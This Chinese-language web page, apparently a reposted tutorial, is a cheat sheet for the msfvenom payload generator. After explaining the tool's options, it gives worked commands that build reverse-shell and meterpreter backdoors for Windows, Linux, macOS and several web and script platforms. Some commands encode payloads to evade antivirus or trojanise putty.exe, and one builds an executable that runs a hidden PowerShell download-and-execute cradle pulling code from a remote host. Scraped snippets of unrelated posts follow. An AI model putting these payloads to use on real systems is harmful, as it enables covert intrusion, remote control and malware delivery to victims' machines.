2. 程式人生 > >Msfvenom 參數實例

Msfvenom 參數實例

阿新 發佈:2018-03-06
Msfvenom 參數

參數說明:


–p (- -payload-options)

添加載荷payload

載荷這個東西比較多,這個軟件就是根據對應的載荷payload生成對應平臺下的後門,所以只有選對payload,再填寫正確自己的IPPORT就可以生成對應語言,對應平臺的後門了!!!

(- -payload-options 列出payload選項)


–l

查看所有payload encoder nops


–f - -help-formats

輸出文件格式。

(- -help-formats 列出所有文件格式)

Executable formats:

asp, aspx, aspx-exe, axis2, dll, elf

, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war


Transform formats:


bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby

, sh, vbapplication, vbscript


–e

編碼免殺。


–a (- -platform – -help-platforms)

選擇架構平臺

x86 | x64 | x86_64

Platforms:

windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe


–o

文件輸出。


–s

生成payload

的最大長度,就是文件大小。


–b

避免使用的字符 例如:不使用 \0f’。


–i

編碼次數。


–c

添加自己的shellcode


–x | -k

捆綁。例如:原先有個正常文件normal.exe 可以通過這個選項把後門捆綁到這個程序上面。




實例:


實例1(簡單生成):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.0.102 LPORT=11111 -f exe -o /Users/jiangzhehao/Downloads/1.exe


-p 指定payloadpayload後跟該payloadoption


-o 指定payload的保存路徑,包含文件名


實例2(替換指定代碼):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.0.102 LPORT=11111 -b '\x00' -f exe -o /Users/jiangzhehao/Downloads/1.exe


-b --bad-char 替換代碼中會出現中斷的字符,如 '\x00\xff'


實例3(指定編碼器):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.0.102 LPORT=11111 -b '\x00' -e x86/shikata_ga_nai -f exe -o /Users/jiangzhehao/Downloads/1.exe


-e 指定特定的編碼器


實例4(綁定後門到其他可執行程序上):

msfvenom -p windows/meterpreter/reverse_http LHOST=172.16.0.102 LPORT=3333 -x /Users/jiangzhehao/Downloads/putty.exe -k -f exe -o /Users/jiangzhehao/Downloads/puuty_bind.exe


-p windows/meterpreter/reverse_http LHOST=172.16.0.102 LPORT=3333 指定payloadpayload的參數

-x /Users/jiangzhehao/Downloads/putty.exe 執行要綁定的軟件

-k 從原始的註文件中分離出來,單獨創建一個進程

-f exe 指定輸出格式

-o /Users/jiangzhehao/Downloads/puuty_bind.exe 指定輸出路徑


實例5 Windows

  1. Msfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:\back.exe

  2. Msfvenom –platform windows –a x86 –p windows/x64/meterpreter/reverse_tcp –f exe –o C:\back.exe


實例6 Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf


實例7 MAC

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho


實例8 PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php


實例9 Asp

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp


實例10 Aspx

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx


實例11 JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp


實例12 War

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war


實例13 Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On>-f raw > shell.sh


實例14 Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl


實例15 Python

msfvenom -p python/meterpreter/reverser_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py


實例16 exe 利用exec執行powershell後門

msfvenom -p windows/exec CMD="powershell.exe -nop -w hidden -c $M=new-object net.webclient;$M.proxy=[Net.WebRequest]::GetSystemWebProxy();$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $M.downloadstring('http://192.168.0.104:8080/4WFjDXrGo7Mj');" -f exe -e x86/shikata_ga_nai -i 6 -o msf.exe

Msfvenom 參數實例

相關推薦

Msfvenom

Msfvenom 參數參數說明: –p (- -payload-options)添加載荷payload。載荷這個東西比較多,這個軟件就是根據對應的載荷payload生成對應平臺下的後門,所以只有選對payload,再填寫正確自己的IP,PORT就可以生成對應語言,對應平臺的後門了!!!(- -payload-

C#中實現可變

param back dddd 數量 ans ack printf函數 技術分享 size C語言的printf函數,參數的數量可以是可變的。使用 va_start 和 va_end 實現。 C++中,實現參數可變,可以用 overload。如果參數數量不是很多的話,可

Python中函定義及

python中函數定義及參數實例1.函數定義 函數就是完成特定功能的一個語句組,這組語句可以作為一個單位使用,並且給它取一個名字 ,可以通過函數名在程序的不同地方多次執行(這通常叫函數調用)預定義函數(可以直接使用)自定義函數(自己編寫)為什麽使用函數? 降低編程難度,通常將一個復雜的大問題分解

mysql命令常用講解

mysqlmysql命令常用參數實例講解以下是mysql命令常用的參數,配合實例進行簡單講解1,auto-rehash自動補全(表名及表中字段) --------------------------------------- [mysql] #no-auto-rehash auto-rehash ------

mysqladmin命令常用講解

mysqladminmysqladmin 工具的使用格式: mysqladmin [option] command [command option] command ......參數選項:-c number 自動運行次數統計,必須和 -i 一起使用 -i number 間隔多長時間重復執行0)每個兩秒查看一次

使用layer 彈出對話框 子父頁面相互傳遞 父頁面獲取子頁面

i++ 獲取 jsb tle article gem 調試 打開 北京 一、先看效果: 1.點擊三個點的圖標彈出了子頁面: 2.子頁面調用父頁面方法,圖一調用父頁面方法,圖二得到父頁面var變量。 3.選擇之後,關閉彈框,父頁面得到

php中常用的字符串大小寫轉換函解釋

php 字符串 處理 PHP字符串處理函數中,最為簡單的幾個函數,相關解釋就不上了,直接看例子。 PHP字符串處理函數中,最為簡單的幾個函數,相關解釋就不上了,直接看例子。 strtolower函數、strtoupper函數、ucfirst函數、ucwords函數<?php $str =

python—函

python1.函數的定義練習:判斷輸入的是不是一個數字#!/usr/bin/env python def isNum(): sth = raw_input("Please input something: ") try: if type(int(sth)) == type(1): pri

python—函2

python一、遞歸 幾種常用內置函數方法:1)os.listdir():列出第一層目錄文件In [14]: os.listdir("/root/python") Out[14]: ['20.py', '1.py', '19.py', 

-turtle畫樹

trac object 當前 end absolut app you obs move # drawtree.py from turtle import Turtle, mainloop def tree(plist, l, a, f): """ plist is l

SHELL傳簡單

shell說明:shell傳參,顧名思義就是將參數傳送到shell腳本裏,我們可以將一些參數以sh scripts.sh 參數 參數+1 參數+2 的方式執行。腳本內獲取參數的格式為:$n n 代表一個數字,$1 為執行腳本的第一個參數(對應上面的參數)$2 為執行腳本的第二個參數,以此類推……

6-1 爆內存函 (6 分)

result 輔助 空間復雜度 部分 分組 執行 裁判 調用次數 其中 本題要求實現一個遞歸函數,用戶傳入非負整型參數n,用戶依次輸出1到n之間的整數。所謂遞歸函數就是指自己調用自己的函數。 說明: (1)遞歸函數求解問題的基本思想是把一個大規模問題的求解歸結為一個相對較小

Python3基礎-函學習

函數 github ins 絕對值 amp 數學庫 abs raise person 內置函數 絕對值函數 x = abs(100) y = abs(-20) print('x=100的絕對值為:{}'.format(x)) print('y=-20

JS-- 一只tom貓 講解構造函 原型 原型的原型

.proto str ref tps class 參考 obj prot iss 參考地址:https://github.com/mqyqingfeng/Blog/issues/2 感謝這位大佬 下面說說我的理解: 第一,看下人物: tom--一只叫tom的貓 Cat()-

(一)Python入門-6面向對象編程:02類的定義-類和對象的關系-構造函-屬性-方法

語句塊 訪問 也不能 form 行為 sizeof 對象創建 div span 一:類的定義   如果把對象比作一個“餅幹”,類就是制造這個餅幹的“模具”。   我們通過類定義數據類型的屬性(數據)和方法(行為),也就是說

Hadoop作業性能指標及調優 (二)Hadoop作業性能調優7個建議

optimize 自帶 管理 導致 10g avg merge map 設置 作者:Shu, Alison Hadoop作業性能調優的兩種場景: 一、用戶觀察到作業性能差,主動尋求幫助。 (一)eBayEagle作業性能分析器 1. Hadoop作業性能異常指標 2.

vue.js路由簡單講解------簡單易懂

.com route 安裝 http git node clas span ont vue中,我們構建單頁面應用時候,一定必不可少用到vue-router vue-router 就是我們的路由,這個由vue官方提供的插件 首先在我們項目中安裝vue-router路由依賴

Oracle初始化詳解

進程 配置參數 param user oracle實例 系統參數 配置 from select BACKGROUND_DUMP_DEST    顯示和設置Oracle數據庫相關日誌的存放地,Oracle11g後不再可配置,但其值仍可顯示相關日誌的存放地,對應配置參數為dia

輸出控制臺傳遞的——小小

學習記錄今天看java經典編程300例中的第二例,發現挺有意思的一個小程序:輸出控制臺傳遞的參數===實現過程:(1)打開一個記事本,編寫以下代碼,並保存,將其命名為Test,擴展名為.java(2)打開Doc控制臺並切換到該文件保存路徑下,控制臺輸入“javac Test.java”命令編譯源代碼,編譯後會

JMeter

程序 介紹 技術 dbo -h style adb 方式 地址 前言:JMeter壓力測試我們不可能用一個帳號開啟1000個線程進行壓力測試,這樣的話肯定不符合用戶的實際操作, 下面就給大家介紹兩種JMeter的參數化教程。 一、準備工作 錄制腳本 既然講到錄制腳本,順